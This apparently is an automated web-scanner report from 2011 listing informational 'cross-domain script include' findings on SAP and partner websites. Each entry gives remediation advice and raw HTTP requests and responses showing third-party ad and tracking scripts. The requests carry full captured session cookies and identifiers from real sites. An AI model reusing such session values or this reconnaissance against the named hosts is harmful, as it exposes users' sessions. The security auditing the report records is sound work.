<P mce_keep="true"><A href="http://bit.ly/SCNFB" target=_blank><IMG height=24 alt="Follow Us on Facebook" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e0dc1d46-ce92-2d10-1d90-bd6b59c27dc0" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e
...[SNIP]...
</A>&nbsp;&nbsp; <A href="http://bit.ly/SCNTwR" target=_blank><IMG height=24 alt="Follow SCN on Twitter" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/30beea32-cf92-2d10-c39d-df6728c1d180" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/3
...[SNIP]...
</A>&nbsp;&nbsp;&nbsp;<A href="http://bit.ly/SCNLnI" target=_blank><IMG height=24 alt="Follow Us on LinkedIn" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f03915bd-cf92-2d10-478c-cbe7715c73b4" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f
...[SNIP]...
</A>&nbsp; &nbsp;<A href="http://bit.ly/SCNyouT" target=_blank><IMG height=24 alt="Follow Us on YouTube" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/9014fd41-cf92-2d10-6e8b-f69878cc0b7f" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/90
...[SNIP]...
</A>&nbsp; &nbsp;<A href="http://bit.ly/SCNFlr" target=_blank><IMG height=24 alt="Follow Us on Flickr" src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104c3912-cf92-2d10-7bab-b4bb160f7154" width=24 mce_src="/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104
...[SNIP]...
<LI><A href="http://www.youtube.com/user/SAPCommunities?feature=mhum#p/c/954293E75EFD857D/44/ravvlID_BG8" target=_blank>Contax Inc., CTO uses SCN</A>
...[SNIP]...
<LI><A href="http://www.youtube.com/user/SAPCommunities?feature=mhum#p/c/954293E75EFD857D/39/EkQg8OL8dKw" target=_blank>Walt Disney Company uses SCN</A>
...[SNIP]...
<LI><A href="http://www.youtube.com/user/SAPCommunities?feature=mhum#p/c/954293E75EFD857D/38/AklUa8k2oRI" target=_blank>Harley-Davidson uses SCN</A>
...[SNIP]...
<LI><A href="http://www.youtube.com/user/SAPCommunities?feature=mhum#p/c/954293E75EFD857D/46/kRkMJNroCcs" target=_blank>Bose uses SCN</A>
...[SNIP]...
18. Cross-domain script include  previous  next
There are 78 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

18.1. http://ecohub.sap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP LJS 1.0.0
SDN_UID: Guest
SDN_RES_KEY: /frontend/
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:07 GMT
Content-Length: 26688
Connection: close
Set-Cookie: rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]
...[SNIP]...
<link href='/stylesheets/style.css?1318315094' media='all' rel='stylesheet' type='text/css' />
<script src='http://partner.googleadservices.com/gampad/google_ads2.js' type='text/javascript'></script>
...[SNIP]...
</script>
<script src='http://partner.googleadservices.com/gampad/google_service.js' type='text/javascript'></script>
...[SNIP]...
</script>
<script src='http://munchkin.marketo.net/munchkin.js' type='text/javascript'></script>
...[SNIP]...
18.2. http://forums.sdn.sap.com/forum.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forum.jspa?forumID=209&start=0 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGODdCMzgtMzg4MkJEODQ2QTg5MDQzRA==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
Content-Length: 45518
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:45 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP Tec
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
18.3. http://forums.sdn.sap.com/thread.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /thread.jspa?threadID=2059162&tstart=0 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://forums.sdn.sap.com/thread.jspa?threadID=2059162&tstart=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGODc0QjgtRkE1N0NBOTJEOENDOEJBQQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
SDN_THREAD: 2059162
SDN_MESSAGE: 10731664
Content-Length: 21892
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP SEC
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS"
href="http://forums.sdn.sap.com/rss/rssmessages.jspa?threadID=2059162">


           <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
18.4. http://info.newsgator.com/Trial_SocialSites2010.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.newsgator.com
Path:   /Trial_SocialSites2010.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Trial_SocialSites2010.html?Leadsource=trial HTTP/1.1
Host: info.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.2.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Sat, 15 Oct 2011 15:29:12 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 59212
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la
...[SNIP]...
<link id="APortals__default_Skins_NewsGator_" rel="stylesheet" type="text/css" href="http://www.newsgator.com/Portals/_default/Skins/NewsGator/skin.css" />
<script src="http://newsgator-com.staging.maddevelopment.com/Resources/Shared/Scripts/jquery/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://munchkin.marketo.net/js/munchkin.js"></script>
...[SNIP]...
18.5. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; extcmp=null; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689060945; fcR=http%3A//www.sap.com/index.epx; mbox=check#true#1318689123|session#1318689062767-959486#1318690923|PC#1318689062767-959486.19#1319898665; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; s_pers=%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%255D%7C1476541862905%3B%20s_ttc%3D1318688493%7C1350225062924%3B%20c13%3Destores%253Aus%253Ahomepage%7C1318690868667%3B%20pe%3Dno%2520value%7C1318690868669%3B%20c3%3Dno%2520value%7C1318690868671%3B%20s_nr%3D1318689068677-New%7C1321281068677%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292668680%3B%20s_visit%3D1%7C1318690868682%3B%20gpv_p47%3D1%7C1318690868684%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20v13%3DCG4DA4BC51%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/DRHM/store%2525253FAction%2525253DDisplayProductDetailsPage%25252526SiteID%2525253Dbobjamer%25252526Locale%2525253D%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443; fcC=X=C2033968180&Y=1318689061488&FV=10&H=1318689060945&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0&E=1135861&F=0&I=1318689068696

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=66142366287,0)
Date: Sat, 15 Oct 2011 14:30:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 105548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pubid=ra-4e3f99bf74164a4e"></script>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
                       <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
18.6. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/DisplayHomePage/pgm.%2077298800

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /store/bobjamer/DisplayHomePage/pgm.%2077298800 HTTP/1.1
Host: store.businessobjects.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=237941434415,0)
Content-Length: 35211
Date: Sat, 15 Oct 2011 14:36:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
...[SNIP]...
18.7. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/DisplayHomePage/pgm.+77298800

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=117681963088,0)
Date: Sat, 15 Oct 2011 14:30:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 152118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="crystal solutions, crystal reports, sap online store, business objects" />

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
                       <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
18.8. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.sap.com/index.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; style=null; extcmp=null; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689071622; mbox=check#true#1318689134|session#1318689062767-959486#1318690934|PC#1318689062767-959486.19#1319898674; s_pers=%20s_ttc%3D1318688493%7C1350225062924%3B%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%252C%255B%2527CG4E7A594%2527%252C%25271318689073781%2527%255D%255D%7C1476541873780%3B%20c13%3Destores%253Aus%253Aproduct%2520page%253A231860300%7C1318690948937%3B%20pe%3DprodView%252Cevent18%7C1318690948939%3B%20c3%3Dno%2520value%7C1318690948941%3B%20s_nr%3D1318689148951-New%7C1321281148951%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292748954%3B%20s_visit%3D1%7C1318690948955%3B%20gpv_p47%3Dno%2520value%7C1318690948958%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20v13%3DCG4E7A594%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Aproduct%25252520page%2525253A231860300%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.5706%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/DRHM/store%3FAction%3DDisplayProductDetailsPage%26SiteID%3Dbobjamer%26Locale%3Den_US%26Env%3DBASE%26productID%3D231860300%26parentCategoryID%3D57065700%26categoryID%3D57066300%26_s_icmp%3DCG4E7A594; fcC=X=C2033968180&Y=1318689071777&FV=10&H=1318689071622&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=1&E=8823527&F=0&I=1318689148969

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=186401532183,0)
Date: Sat, 15 Oct 2011 14:32:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 84990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
   <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
18.9. http://weblogs.sdn.sap.com/pub/q/top_weblogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/q/top_weblogs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/q/top_weblogs HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/pub/q/top_weblogs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
